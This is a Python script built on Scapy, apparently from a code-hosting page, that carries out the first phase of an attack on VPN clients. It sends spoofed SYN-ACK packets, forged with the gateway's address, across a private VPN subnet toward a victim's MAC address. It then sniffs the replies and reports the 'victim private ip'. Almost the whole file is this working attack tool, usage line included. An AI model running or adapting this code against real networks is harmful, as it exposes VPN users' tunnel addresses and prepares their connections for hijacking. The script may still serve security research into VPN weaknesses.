You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
155 lines
3.9 KiB
155 lines
3.9 KiB
#!/usr/bin/env python3
|
|
from scapy.all import *
|
|
import ipaddress
|
|
from threading import Thread, Event
|
|
from time import sleep
|
|
import os
|
|
|
|
#
|
|
#
|
|
#
|
|
#
|
|
# Thread classes for sniffing
|
|
#
|
|
# Sniffer Class all grabbed from https://www.cybrary.it/0p3n/sniffing-inside-thread-scapy-python/
|
|
|
|
class Sniffer(Thread):
|
|
def __init__(self, iface="en0"):
|
|
|
|
super().__init__()
|
|
|
|
self.daemon = True
|
|
self.vpn_addr = None
|
|
|
|
self.current_phase = 1
|
|
self.spoof_count = 0
|
|
self.spoof_port = 0
|
|
|
|
self.socket = None
|
|
self.iface = iface
|
|
self.stop_sniffer = Event()
|
|
|
|
def run(self):
|
|
self.socket = conf.L2listen(
|
|
type=ETH_P_ALL,
|
|
iface=self.iface,
|
|
filter="ip"
|
|
)
|
|
|
|
sniff(
|
|
opened_socket=self.socket,
|
|
prn=self.handle_packet,
|
|
|
|
)
|
|
|
|
def join(self, timeout=None):
|
|
self.stop_sniffer.set()
|
|
super().join(timeout)
|
|
|
|
def get_vpn_addr(self):
|
|
return self.vpn_addr
|
|
|
|
def set_phase(self, phase):
|
|
self.current_phase = phase
|
|
|
|
|
|
|
|
def check_for_req(self, packet):
|
|
|
|
ip_layer = packet.getlayer(IP)
|
|
|
|
# for phase 1 (on ubuntu 19) we wanna look for a reset
|
|
# with source of private vpn address and dest of gateway
|
|
|
|
if self.current_phase == 1:
|
|
|
|
if "10." in ip_layer.src:
|
|
|
|
if ip_layer.src == self.vpn_addr:
|
|
print("multiple matches for: " + str(self.vpn_addr))
|
|
# could make the scan stop after this point but
|
|
# only takes a second or two to finish up
|
|
|
|
print("Victim private ip is: " + str(ip_layer.src))
|
|
self.vpn_addr = ip_layer.src
|
|
|
|
|
|
|
|
|
|
def handle_packet(self, packet):
|
|
|
|
#ip_layer = packet.getlayer(IP)
|
|
#print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))
|
|
|
|
# if its not an SSH packet then check for challenge acks
|
|
#
|
|
if TCP in packet:
|
|
tcp_sport = packet[TCP].sport
|
|
tcp_dport = packet[TCP].dport
|
|
|
|
if (tcp_sport != 2222 and tcp_dport != 2222) or (tcp_sport != 22 and tcp_dport != 22):
|
|
|
|
self.check_for_req(packet)
|
|
############
|
|
|
|
def phase_one_spread(gateway_ip, dst_net, iface="en0", edst="08:00:27:5c:c9:d1",
|
|
sport=50505, dport=443, flags="SA"):
|
|
|
|
pieces = gateway_ip.split('.')
|
|
src = pieces[0] + '.' + pieces[1] + '.' + pieces[2] + '.1'# should be gateway of LAN
|
|
src = gateway_ip
|
|
eth = Ether(dst=edst)
|
|
tcps = TCP(sport=sport,dport=dport,flags=flags) # src and dst ports don't matter
|
|
|
|
for ip in ipaddress.IPv4Network(dst_net + '/24'):
|
|
print('{} to: {}'.format(flags, str(ip)))
|
|
ip_pack = IP(src = src, dst = str(ip))
|
|
sendp(eth/ip_pack/tcps, iface=iface, count=2, verbose=0)
|
|
|
|
|
|
print("\nFinished spreading to private address space.")
|
|
|
|
|
|
def main():
|
|
if len(sys.argv) < 5:
|
|
print("Usage:\n{} {} {} {} {} [{}] [{}]".format(
|
|
sys.argv[0], "<GATEWAY_IP>", "<VPN SUBNET>", "<IFACE>", "<VICTIM_MAC>",
|
|
"<SPORT>", "<>"))
|
|
exit(-1)
|
|
gateway_ip = sys.argv[1]
|
|
vpn_net = sys.argv[2]
|
|
iface = sys.argv[3]
|
|
edst = sys.argv[4]
|
|
if len(sys.argv) == 6:
|
|
sport = int(sys.argv[5])
|
|
else:
|
|
sport = 50505
|
|
if len(sys.argv) == 7:
|
|
dport = int(sys.argv[6])
|
|
else:
|
|
dport = 443
|
|
if len(sys.argv) == 8:
|
|
flags = sys.argv[7]
|
|
else:
|
|
flags = "SA"
|
|
|
|
|
|
sniffer = Sniffer(iface=iface)
|
|
sniffer.start()
|
|
|
|
## Phase 1 - spread private address range passed in
|
|
#
|
|
sleep(.5)
|
|
|
|
print("Scanning entire dest net " + str(vpn_net))
|
|
phase_one_spread(gateway_ip, str(vpn_net),
|
|
iface=iface, edst=edst,
|
|
sport=sport, dport=dport, flags=flags)
|
|
|
|
vpn_addr = sniffer.get_vpn_addr()
|
|
print('Completed phase one and found client has private VPN address: ' + str(vpn_addr) + '\n\n')
|
|
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main()
|